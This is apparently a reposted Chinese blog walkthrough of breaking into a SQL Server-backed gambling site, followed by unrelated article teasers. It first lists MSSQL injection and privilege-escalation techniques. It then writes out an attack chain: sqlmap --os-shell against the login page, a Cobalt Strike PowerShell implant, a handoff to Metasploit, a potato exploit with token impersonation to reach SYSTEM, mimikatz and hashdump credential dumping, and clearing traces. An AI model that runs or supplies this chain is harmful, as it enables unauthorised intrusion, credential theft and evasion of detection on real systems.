运维知识点-SQLServer/mssql

news2024/11/19 14:54:02

在这里插入图片描述

SQLServer/mssql

  • Microsoft structed query language
    • 常见注入
    • 提权
  • 技术点:
    • 0x00 打点前提
  • 0x01 上线CS
  • 0x02 提权
  • 0x03 转场msf
  • 0x04 抓取Hash
  • 0x05 清理痕迹

Microsoft structed query language

常见注入

基于联合查询注入 order by 判断列数(对应数据类型)
报错 (数据类型转换报错) convert(int,str) object_id xxxx
bool and 1=1 and 1=2
时间 if(ascii(substring(db_name(),1,1)))>101 waitfor delay ‘00:00:03’;
堆叠 (另起一个sql语句)

提权

xp_cmdshell 自带命令执行
trigger 触发器控制对特定表执行增删改查,可以调用xp_cmdshell来执行特定命令。
sp_oacreate 调用模块 wscript.shell 增加新用户为管理
job 计划任务 先开启代理服务 创建任务 执行任务

技术点:

云盾躲避
cs / msf 配合上线
提权

0x00 打点前提

BC站 登录界面
在这里插入图片描述
sqlmap 直接跑 sql盲注

 sqlmap -u "http://127.0.0.1/Login/index " --form --batch --os-shell

在这里插入图片描述
在这里插入图片描述
os-shell

在这里插入图片描述

0x01 上线CS

Cobalt Strike

● 创建监听
在这里插入图片描述
生成一个Powershell command的木马

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
丢到刚刚的shell命令行里面去
在这里插入图片描述
在这里插入图片描述
● 查看权限
当前的shell权限,只有nt service\mssqlserver,权限很低在这里插入图片描述

0x02 提权

在这里插入图片描述

● 查看补丁
安装了154个补丁

 修补程序:         安装了 154 个修补程序。
                  [01]: KB2959936
                  [02]: KB3191564
                  [03]: KB2896496
                  [04]: KB2919355
                  [05]: KB2920189
                  [06]: KB2928120
                  [07]: KB2931358
                  [08]: KB2931366
                  [09]: KB2933826
                  [10]: KB2938066
                  [11]: KB2938772
                  [12]: KB2949621
                  [13]: KB2954879
                  [14]: KB2958262
                  [15]: KB2958263
                  [16]: KB2961072
                  [17]: KB2965500
                  [18]: KB2966407
                  [19]: KB2967917
                  [20]: KB2971203
                  [21]: KB2971850
                  [22]: KB2973351
                  [23]: KB2973448
                  [24]: KB2975061
                  [25]: KB2976627
                  [26]: KB2977629
                  [27]: KB2981580
                  [28]: KB2987107
                  [29]: KB2989647
                  [30]: KB2989930
                  [31]: KB2998527
                  [32]: KB3000850
                  [33]: KB3003057
                  [34]: KB3004545
                  [35]: KB3008242
                  [36]: KB3011780
                  [37]: KB3012702
                  [38]: KB3013172
                  [39]: KB3013410
                  [40]: KB3013538
                  [41]: KB3013769
                  [42]: KB3013791
                  [43]: KB3013816
                  [44]: KB3014442
                  [45]: KB3019978
                  [46]: KB3021674
                  [47]: KB3023266
                  [48]: KB3024751
                  [49]: KB3024755
                  [50]: KB3027209
                  [51]: KB3030947
                  [52]: KB3031044
                  [53]: KB3033446
                  [54]: KB3034348
                  [55]: KB3035126
                  [56]: KB3036612
                  [57]: KB3038002
                  [58]: KB3042058
                  [59]: KB3042085
                  [60]: KB3043812
                  [61]: KB3044374
                  [62]: KB3044673
                  [63]: KB3045634
                  [64]: KB3045685
                  [65]: KB3045717
                  [66]: KB3045719
                  [67]: KB3045755
                  [68]: KB3045999
                  [69]: KB3046017
                  [70]: KB3046737
                  [71]: KB3048043
                  [72]: KB3054169
                  [73]: KB3054203
                  [74]: KB3054256
                  [75]: KB3054464
                  [76]: KB3055323
                  [77]: KB3055343
                  [78]: KB3055642
                  [79]: KB3059317
                  [80]: KB3060681
                  [81]: KB3060793
                  [82]: KB3061512
                  [83]: KB3063843
                  [84]: KB3071756
                  [85]: KB3077715
                  [86]: KB3078405
                  [87]: KB3078676
                  [88]: KB3080149
                  [89]: KB3081320
                  [90]: KB3082089
                  [91]: KB3084135
                  [92]: KB3084905
                  [93]: KB3086255
                  [94]: KB3087137
                  [95]: KB3091297
                  [96]: KB3092601
                  [97]: KB3092627
                  [98]: KB3094486
                  [99]: KB3095701
                  [100]: KB3099834
                  [101]: KB3100473
                  [102]: KB3102429
                  [103]: KB3102939
                  [104]: KB3103616
                  [105]: KB3103696
                  [106]: KB3103709
                  [107]: KB3109103
                  [108]: KB3109976
                  [109]: KB3110329
                  [110]: KB3115224
                  [111]: KB3121261
                  [112]: KB3123245
                  [113]: KB3126041
                  [114]: KB3126434
                  [115]: KB3126587
                  [116]: KB3126593
                  [117]: KB3132080
                  [118]: KB3133043
                  [119]: KB3133690
                  [120]: KB3134179
                  [121]: KB3134815
                  [122]: KB3137728
                  [123]: KB3138602
                  [124]: KB3139164
                  [125]: KB3139398
                  [126]: KB3139914
                  [127]: KB3140219
                  [128]: KB3140234
                  [129]: KB3144850
                  [130]: KB3145384
                  [131]: KB3145432
                  [132]: KB3146604
                  [133]: KB3146723
                  [134]: KB3146751
                  [135]: KB3147071
                  [136]: KB3149157
                  [137]: KB3155784
                  [138]: KB3156059
                  [139]: KB3159398
                  [140]: KB3161949
                  [141]: KB3162343
                  [142]: KB3172614
                  [143]: KB3172729
                  [144]: KB3175024
                  [145]: KB3178539
                  [146]: KB3179574
                  [147]: KB3185319
                  [148]: KB4033428
                  [149]: KB4483187
                  [150]: KB4486105
                  [151]: KB4486107
                  [152]: KB5001403
                  [153]: KB5007154
                  [154]: KB5008263
网卡:             安装了 1 个 NIC。
                  [01]: Red Hat VirtIO Ethernet Adapter
                      连接名:      以太网
                      启用 DHCP:

使用ms16-075试试
在这里插入图片描述

查看AV
在这里插入图片描述

https://mrxn.net/avlist/
在这里插入图片描述

有阿里云盾

0x03 转场msf

● 新建 payload
选择 Foreign HTTP

在这里插入图片描述
在msf上使用

在这里插入图片描述

● CS 新建会话

在这里插入图片描述
选择你的会话即可派生会话

在这里插入图片描述
在msf上等到会话连接(注意:域前置貌似无法派生会话)

在这里插入图片描述

在这里插入图片描述
权限依旧很低,在CS里面使用文件浏览上传烂土豆

在这里插入图片描述
在这里插入图片描述

● 在当前会话里面,开始提权:

 cd C:\\Users\\Public
use incognito
execute -cH -f ./potato.exe
list_tokens -u
复制administrator的令牌
impersonate_token "administrator的令牌"

在这里插入图片描述
拿到了system权限

0x04 抓取Hash

 load mimikatz
creds_all

在这里插入图片描述
在这里插入图片描述
使用msf自带的:run post/windows/gather/smart_hashdump

在这里插入图片描述
直接登录

0x05 清理痕迹

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1269818.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C++二分查找算法:包含每个查询的最小区间

本文涉及的基础知识点 二分查找算法合集 作者推荐 动态规划LeetCode2552:优化了6版的1324模式 题目 给你一个二维整数数组 intervals ,其中 intervals[i] [lefti, righti] 表示第 i 个区间开始于 lefti 、结束于 righti(包含两侧取值&a…

【Lustre相关】应用部署-03-Lustre集群部署实践(软raid方案)

文章目录 一、前言1、硬件配置2、组网拓扑3、总体方案 二、软件安装三、集群部署1、配置多路径2、配置高可用集群3、配置zpool4、部署lustre5、配置Lustre角色高可用6、配置Lustre状态监控6.1、Lustre网络状态监控6.2、Lustre集群状态监控6.3、配置优化6.3.1、设置故障恢复不回…

7Docker搭建es和kibana

一、安装es 1.拉取镜像 sudo docker pull elasticsearch:7.12.0 elasticsearch:7.12.0:我安装的版本是7.12.0,可以根据实际的情况安装 创建docker容器挂在的目录: sudo mkdir -p /opt/elasticsearch/config sudo mkdir -p /opt/elasticsearch/data s…

TA-Lib学习研究笔记——Overlap Studies(二)上

TA-Lib学习研究笔记——Overlap Studies(二) 1. Overlap Studies 指标 [BBANDS, DEMA, EMA, HT_TRENDLINE, KAMA, MA, MAMA, MAVP, MIDPOINT, MIDPRICE, SAR, SAREXT, SMA, T3, TEMA, TRIMA, WMA]2.数据准备 get_data函数参数(代码&#x…

沿着马可·波罗的足迹,看数字云南

刚入行的时候,有位前辈跟我说过一句话:去现场“要像外国人一样去看”,重新审视那些自己可能早已“熟视无睹”的事物。 前不久,我跟随“看见数字云南——云南数字经济媒体探营活动”,奔赴昆明、大理、西双版纳等地&…

springmvc(基础学习整合)

SpringMVC是Spring框架提供的构建Web应用程序的全功能MVC模块。 在SpringMVC的各个组件中,处理器映射器、处理器适配器、视图解析器称为SpringMVC的三大组件。 springMVC基本介绍: http://t.csdnimg.cn/TOzw9 MVC是一种设计思想,将一个应…

基于ssm的汽车论坛管理系统设计与实现

基于ssm的汽车论坛管理系统设计与实现 摘要:信息化社会内需要与之针对性的信息获取途径,但是途径的扩展基本上为人们所努力的方向,由于站在的角度存在偏差,人们经常能够获得不同类型信息,这也是技术最为难以攻克的课题…

WordPress 粘贴图片上传插件

找了很久,发现一款不错的插件,允许我们直接粘贴图片文件并且上传到媒体库。以前的插件上传后媒体库不会显示,这个要显示。 启用后编辑器会有一个图标,如果开启,那么久可以截图后直接粘贴了。 学习资料源代码&#xf…

每日一题:LeetCode-283. 移动零

每日一题系列(day 08) 前言: 🌈 🌈 🌈 🌈 🌈 🌈 🌈 🌈 🌈 🌈 🌈 🌈 🌈 &#x1f50e…

Django大回顾 -3 之响应对象、cbv和fbv、关于类中self是谁的问题、上传文件、模版

【1】isinstance方法 判断一个对象是否是一个已知的类型。 isinstance语法: isinstance(object,classinfo) object --------- 实例化对象 cassinfo ------- 可以是字节或间接类名、基本类型,或者由他们组成的元组 相同返回True,不…

数据挖掘 感知机

要使用感知机,我们首先要引入头文件,以下是感知机用的到头文件: import pandas as pd import numpy as np import matplotlib.pyplot as plt from sklearn.linear_model import Perceptron from sklearn.model_selection import train_test_…

【刷题】树的遍历

层序遍历 层序遍历需要用到广度有限搜索,也就是需要队列 1.将根节点加入队列、 2.如果队列不为空,就得到队列的长度,对队列中现有的元素进行访问并从队列中删除,并将其子节点加入到队列中 102. 二叉树的层序遍历 给你二叉树的根…

css浮动属性学习

在此文, html菜单的基本制作-CSDN博客 已经看到css 浮动属性的效果;下面单独看一下浮动属性; 做4个div,设置不同的背景色,不为div添加float属性;效果如下; 因为div是块级元素,默认…

开源播放器GSYVideoPlayer + ViewPager2 源码解析

开源播放器GSYVideoPlayer ViewPager2 源码解析 前言一、GSYVideoPlayer🔥🔥🔥是什么?二、源码解析1.ViewPager2Activity 总结 前言 本文介绍GSYVideoPlayer源码中关于ViewPager2 GSYVideoPlayer 实现的滑动播放列表的实现原理。…

(C++)复写零--双指针法

个人主页:Lei宝啊 愿所有美好如期而遇 力扣(LeetCode)官网 - 全球极客挚爱的技术成长平台备战技术面试?力扣提供海量技术面试资源,帮助你高效提升编程技能,轻松拿下世界 IT 名企 Dream Offer。https://le…

enote笔记法之附录1——“语法词”(即“关联词”)(ver0.24)

enote笔记法之附录1——“语法词”(即“关联词”)(ver0.24) 最上面的是截屏的完整版,分割线下面的是纯文字版本: 作者姓名(本人的真实姓名):胡佳吉 居住地&#xff1…

A*算法学习

系列文章目录 前言 在总结 2023华为软件精英挑战赛——全赛段思路分享与总结 - 知乎 (zhihu.com)时,发现自己还有很多技术细节没搞懂,这里看静态全局路径规划最常见的A*算法,这个博主讲得很好: A-Star(A*&#xff0…

AI模特换装的前端实现

本文作者为 360 奇舞团前端开发工程师 随着AI的火热发展,涌现了一些AI模特换装的前端工具(比如weshop网站),他们是怎么实现的呢?使用了什么技术呢?下文我们就来探索一下其实现原理。 总体的实现流程如下&am…

HarmonyOS将程序下载并运行到真机上 (华为手机为例)

前面的文章 我们讲到过一些关于这个预览器的操作 可以在上面看到我们代码的一个整体效果 但其实 这边可以真实的运行在我们自己的手机上 因为你这个预览器再好 还是和实际的手机环境有所偏差 首先 我们要设置一下手机 我们在设置中 找到 关于手机 然后 这下面 有一个 Harmo…

如何使用阿里云虚拟主机和域名设置网站?

本文档将向您展示如何使用阿里云虚拟主机来设置一个新网站,并完成一个域名。如果您按照此处的步骤操作,您将启动并运行一个新网站,可以使用您选择的名称在全球范围内访问,并托管在阿里云平台上。 本文档假设您已经拥有有效的阿里…